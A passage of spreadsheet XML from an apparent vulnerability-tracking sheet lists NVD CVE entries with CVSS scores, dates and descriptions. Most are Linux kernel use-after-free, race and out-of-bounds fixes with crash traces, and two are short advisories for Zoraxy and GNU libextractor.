queued successfully. Taking it after queue_work() is safe because all
three callers hold tcon-&gt;open_file_lock across the call and
_cifsFileInfo_put() decrements under that same lock, so a worker that
starts the handler in the window cannot drop the reference before it has
been taken.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97557</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97562</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr"/>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: pin DFS superblock in iterator callback
tcon_super_cb() stores a raw superblock pointer, but __cifs_get_super()
takes its active reference only after iterate_supers_type() has dropped
s_umount and its passive reference. Concurrent DFS automount expiry can
therefore free the superblock before cifs_sb_active() uses it.
A deterministic KASAN test reproduces the race as:
  BUG: KASAN: slab-use-after-free in cifs_sb_active+0x77/0x80
The same test passes with this change applied.
Take the active reference in the callback while iterate_supers_type()
still holds s_umount shared. cifs_put_tcp_super() remains the matching
release.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97562</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97583</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr"/>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
afs: Clear stale peer app data after address list changes
afs_fs_probe_fileserver() fetches the current endpoint state under
server-&gt;fs_lock, but leaves old_alist as NULL.  Consequently,
afs_set_peer_appdata() treats every address list replacement as initial
setup and only binds the new peers; it never unbinds peers removed from
the old list.
An address refresh can therefore proceed as follows.  CPU 0 replaces
server S's list and drops Pold without clearing Pold-&gt;app_data.  The
server destroyer then clears only S's current peers and lets S reach its
RCU callback.  After the callback frees S, CPU 1 handles a callback
through an RxRPC connection that still pins Pold, reads Pold-&gt;app_data,
and calls afs_use_server() on the freed object.
KASAN reported:
  BUG: KASAN: slab-use-after-free in afs_find_server+0x3c/0xa0
  Read of size 4 at addr ffff8881013e1af0 by task krxrpcio/7001/74
  Call Trace:
   afs_find_server+0x3c/0xa0
   afs_rx_new_call+0x15c/0x390
   rxrpc_new_incoming_call+0x97c/0x1730
   rxrpc_input_packet.constprop.0+0xd03/0xec0
   rxrpc_io_thread+0x967/0x1640
  Allocated by task 93:
   afs_lookup_server+0x1a7/0x14c0
   afs_alloc_server_list+0x43f/0xb60
   afs_create_volume+0x923/0x1490
   afs_get_tree+0x1c6/0x10a0
  Freed by task 0:
   kfree+0x131/0x3c0
   rcu_core+0x50a/0x1850
  Last potentially related work creation:
   __call_rcu_common.constprop.0+0x71/0xa10
   afs_put_server+0x213/0x2b0
Preserve old-&gt;addresses for the peer app-data update so that removed
peers are cleared before the endpoint state is replaced.  Also advance
both cursors when the old and new lists share a peer; activating the
old/new comparison without this would otherwise loop forever on the
shared entry.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97583</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97595</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr"/>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mac802154: fix use-after-free of sdata via queued RX frames
The RX softirq producer ieee802154_subif_frame() queues received beacon
and MAC-command frames onto local-&gt;rx_beacon_list / rx_mac_cmd_list and
schedules a process-context worker, storing a raw mac_pkt-&gt;sdata (and
skb-&gt;dev == sdata-&gt;dev) with neither a reference nor any locking:
 - the lists have no lock: the softirq producer list_add_tail()s while the
   mac_wq worker list_del()s, so sibling interfaces on the same phy corrupt
   the list;
 - the workers dereference the interface after it may have been freed.
   mac802154_rx_mac_cmd_worker() touches mac_pkt-&gt;sdata directly, and
   mac802154_rx_beacon_worker() -&gt; mac802154_process_beacon() dereferences
   skb-&gt;dev (== sdata-&gt;dev). Removing an interface frees its sdata
   (netdev_priv) while a queued frame still points at it, so a later worker
   run is a use-after-free.
Reproduced under KASAN by flooding a victim interface with MAC command
frames and removing it (the beacon path is the same class via skb-&gt;dev):
  BUG: KASAN: slab-use-after-free in mac802154_rx_mac_cmd_worker+0x463/0x630 [mac802154]
  Read of size 4 at addr ffff888002f9ea18 by task kworker/u8:1/31
  Workqueue: phy0-mac-cmds mac802154_rx_mac_cmd_worker [mac802154]
  Call Trace:
   mac802154_rx_mac_cmd_worker+0x463/0x630 [mac802154]
   process_one_work+0x611/0xe80
   worker_thread+0x52e/0xdc0
   kthread+0x30c/0x630
   ret_from_fork+0x2fd/0x3e0
Fix both lists together:
 - add local-&gt;rx_lock and take it around every list access: the softirq
   producer (plain spin_lock, softirq context) and the workers and flush
   (spin_lock_bh, process context);
 - pin the interface for the lifetime of a queued frame with
   netdev_hold()/netdev_put(), so the worker can safely dereference sdata /
   skb-&gt;dev even while the interface is being removed;
 - dequeue under the lock at the head and loop-drain the whole list in the
   workers (they previously processed one frame per run and relied on a
   later enqueue to drain the rest);
 - drop not-yet-started frames of an interface before it is unregistered,
   from ieee802154_if_remove() (after the RCU grace period) and from the
   ieee802154_remove_interfaces() loop -- the latter is the whole-phy
   teardown path, which does not go through ieee802154_if_remove().
An in-flight worker that already dequeued a frame keeps its own netdev
reference; unregister_netdevice() then waits it out in netdev_run_todo(),
which runs at rtnl_unlock() (rtnl released) and after the interface has
been closed, so it does not pin rtnl. A worker blocked in an association
TX only delays that one interface's unregister (the usual "waiting for %s
to become free"), it does not hold rtnl. netdev_hold() is used for this
reason instead of a cancel_work_sync() under rtnl, which would block on
the worker's unbounded MLME TX wait via ieee802154_sync_queue().
The mac-command worker additionally skips processing for a stopped
interface (ieee802154_sdata_running()), avoiding a needless association
response during teardown.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97595</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97990</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr"/>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vdpa_sim_net: check TX pull result before RX copy
vringh_iov_pull_iotlb() returns a signed byte count.  A failed TX pull is
currently added to the unsigned byte counter and then passed as a size_t
length to receive_filter() and vringh_iov_push_iotlb().  A negative error
can therefore become a large length in the RX path.
Handle non-positive pull results before every length use.  Count the TX
error and complete the consumed TX descriptor with zero bytes.
I found this bug myself, though the patch was written with AI assistance.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97990</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98050</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr"/>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_ptp: Fix napi_gro_receive() call from GC workqueue context
Currently mlxsw_sp1_ptp_ht_gc_collect() is run from the PTP
garbage-collection workqueue, rather than the NAPI poll context. For any
unmatched PTP entries carrying an SKB, it calls
mlxsw_sp1_ptp_unmatched_finish() -&gt; mlxsw_sp1_ptp_packet_finish(). For
ingress packets, this calls mlxsw_sp_rx_listener_no_mark_func(). The end
of that function is the following:
    skb-&gt;protocol = eth_type_trans(skb, skb-&gt;dev);
    napi_gro_receive(mlxsw_skb_cb(skb)-&gt;rx_md_info.napi, skb);
The napi pointer is one that was placed in the SKB control block when the
trapped packet was received in the NAPI context. Later, when the GC reaps
the unmatched entry (up to MLXSW_SP1_PTP_HT_GC_TIMEOUT later), the call to
napi_gro_receive() mutates the NAPI instance's GRO list, which is unsafe
if the poll is running concurrently on another CPU.
In mlxsw_sp1_ptp_ht_gc_collect(), local_bh_disable() is called to prevent
softirq processing, but this only applies to the local CPU. Additionally,
its comment is stale. It states that mlxsw_sp1_ptp_unmatched_finish()
invokes netif_receive_skb(). This has not been accurate since the
referenced commit; this patch makes that comment accurate again.
mlxsw_pci_napi_devs_init() calls netif_threaded_enable() on the NAPI RX
net_device without any conditions. The NAPI instance's poll, which may be
running concurrent to the GC, is running as an independently-scheduled
kthread which may be on a different CPU. The call to local_bh_disable()
does not guard against this.
If a tx-timestamp timeout produces an unmatched entry (which can be easily
reproduced by running ptp4l and waiting for a port to reach the
UNCALIBRATED/SLAVE state) while the owning NAPI thread is in the middle of
a poll on another CPU, both sides mutate the GRO list concurrently, as
shown below:
  [39.846] port 1 (swp1): MASTER to UNCALIBRATED on RS_SLAVE
  list_add corruption. next-&gt;prev should be prev (ffff8d620faf4138), but was ffff8d624150f700. (next=ffff8d620faf4138).
  kernel BUG at lib/list_debug.c:29!
  Oops: invalid opcode: 0000 [#1] SMP PTI
  CPU: 1 UID: 0 PID: 539 Comm: napi/mlxsw_rx-0 Not tainted 6.18.48 #1-NixOS PREEMPT(lazy)
  Hardware name: Mellanox Technologies Ltd. MSN2410/VMOD0001, BIOS 4.6.5 09/13/2018
  RIP: 0010:__list_add_valid_or_report+0x79/0xb0
  RSP: 0018:ffffcdf8c0f27c08 EFLAGS: 00010246
  RAX: 0000000000000075 RBX: ffff8d624150fd00 RCX: 0000000000000000
  RDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff8d6315d1e540
  RBP: ffff8d620faf4070 R08: 0000000000000000 R09: 00000000ffffdfff
  R10: ffffffffa5c60fe0 R11: ffffcdf8c0f27ab8 R12: 0000000000000003
  R13: 000000000000003d R14: 00000000000001bc R15: 0000000000000001
  FS:  0000000000000000(0000) GS:ffff8d636f63f000(0000) knlGS:0000000000000000
  CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
  CR2: 0000562689a60c24 CR3: 000000015f224004 CR4: 00000000001726f0
  Call Trace:
  &lt;TASK&gt;
  gro_receive_skb+0xee/0x230
  mlxsw_sp1_ptp_got_packet+0x61/0x140 [mlxsw_spectrum]
  mlxsw_core_skb_receive+0xdf/0x1b0 [mlxsw_core]
  mlxsw_pci_napi_poll_cq_rx+0x780/0x9d0 [mlxsw_pci]
  __napi_poll+0x31/0x1e0
  napi_threaded_poll_loop+0x16b/0x1c0
  napi_threaded_poll+0x71/0xa0
  kthread+0xfb/0x260
  ret_from_fork+0x22d/0x260
  ret_from_fork_asm+0x1a/0x30
  &lt;/TASK&gt;
  Kernel panic - not syncing: Fatal exception in interrupt
The machinery that leads to this kernel panic has not been changed between
6.18.48 and mainline.
This patch adds an ingress-delivery helper for the PTP packet_finish()
path that calls netif_receive_skb() instead of napi_gro_receive().
netif_receive_skb(), unlike napi_gro_receive(), can be called from outside
of the NAPI instance's poll context, which can occur at the call site for
this path. RX stats accounting and the skb-&gt;dev assignment are still
preserved; the only change is the delivery call itself.
This removes GR
---truncated---</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98050</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98056</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr"/>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme: remove stale namespaces by NSID range during scan
nvme_scan_ns_list() drops the stale namespaces in each gap in the
reported NSID list one NSID at a time. Every iteration calls
nvme_find_get_ns() to look the namespace up and removes it if it is
present. The loop runs once per NSID in the gap rather than once per
namespace actually present.
NSIDs are 32-bit, so a target with a sparse NSID space can make a
single gap spin the loop billions of times with nothing to remove.
  watchdog: BUG: soft lockup - CPU#4 stuck for 26s!
  Workqueue: nvme-wq nvme_scan_work [nvme_core]
  RIP: 0010:__srcu_read_unlock+0xb/0x20
  Call Trace:
   nvme_find_get_ns+0x7d/0xb0 [nvme_core]
   nvme_scan_ns_list+0xe8/0x280 [nvme_core]
   nvme_scan_work+0x18a/0x280 [nvme_core]
   process_one_work+0x197/0x380
   worker_thread+0x2fe/0x410
   kthread+0xe0/0x100
Rename nvme_remove_invalid_namespaces() to nvme_remove_nsid_range()
and give it an open (start, end) NSID range. ctrl-&gt;namespaces is
sorted by NSID, so the whole gap is dropped in a single walk that
stops once end is reached. This bounds the work by the namespaces
that are present instead of by the size of the gap.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98056</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98108</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr"/>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: fix chan mode for LE_CONN_REQ + EXT_FLOWCTL pchan
l2cap_new_connection() sets default value of channel mode to match the
parent channel.  l2cap_le_connect_req() left this at the default, and
created L2CAP_MODE_EXT_FLOWCTL channels if listening pchan has that
mode.  This causes FLAG_DEFER_SETUP channels to reply to
L2CAP_LE_CONN_REQ with L2CAP_ECRED_CONN_RSP, which is incorrect.
It can also result to stack OOB write (of l2cap_alloc_cid determined
values) in l2cap_ecred_rsp_defer(), as l2cap_le_connect_req() does not
limit maximum number of deferred channels or check for duplicate ident.
Fix by setting chan-&gt;mode correctly in l2cap_le_connect_req().
Also check channel mode in l2cap_ecred_rsp_defer(), and do WARN_ON_ONCE
instead of OOB write to make it less brittle.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98108</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100390</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>Zoraxy versions 3.2.3 through 3.3.4 fail to properly parse IPv6 addresses in the RemoteAddr field when setting forwarded headers. Unauthenticated attackers connecting over IPv6 can supply arbitrary X-Forwarded-For values to spoof their source IP and bypass authorization provider IP-based access controls.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100390</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98096</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr"/>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: sr: restore network header before routing and forwarding
ipv6_srh_rcv() runs with skb-&gt;data at the Segment Routing Header (SRH)
while skb_network_header() points at the IPv6 header.
When segments_left &gt; 0, ipv6_srh_rcv() previously restored the skb-&gt;data
position by pushing sizeof(struct ipv6hdr), assuming the SRH immediately
followed the fixed IPv6 header. If another extension header (such as a
Hop-by-Hop options header) precedes the SRH, skb_network_offset()
remained negative.
This led to two problems:
1. During ip6_route_input(), fib6_rules_early_flow_dissect() invokes
   __skb_flow_dissect() which passes the negative skb_network_offset()
   to flow dissection, breaking BPF and C flow dissector logic.
2. If forwarded via ip6_forward() or redirected via act_mirred, downstream
   handlers (like sch_fragment() or neighbour output) pass the negative
   offset as an unsigned length, triggering OOB memcpy or buffer overflows.
Fix this by pushing -skb_network_offset(skb) before routing, ensuring
skb_network_offset(skb) is 0 for route lookup / flow dissection as well as
downstream forwarding. On the loopback path, pull skb_transport_offset(skb)
to restore skb-&gt;data to the SRH before looping back.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98096</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100310</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>GNU libextractor before 1.16 loads plugins from an untrusted search path specified by the LIBEXTRACTOR_PREFIX environment variable without proper privilege checks. A local attacker can exploit this by setting LIBEXTRACTOR_PREFIX to a directory containing a malicious plugin that executes arbitrary code with elevated privileges when loaded by a setuid or setgid program.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100310</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100530</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
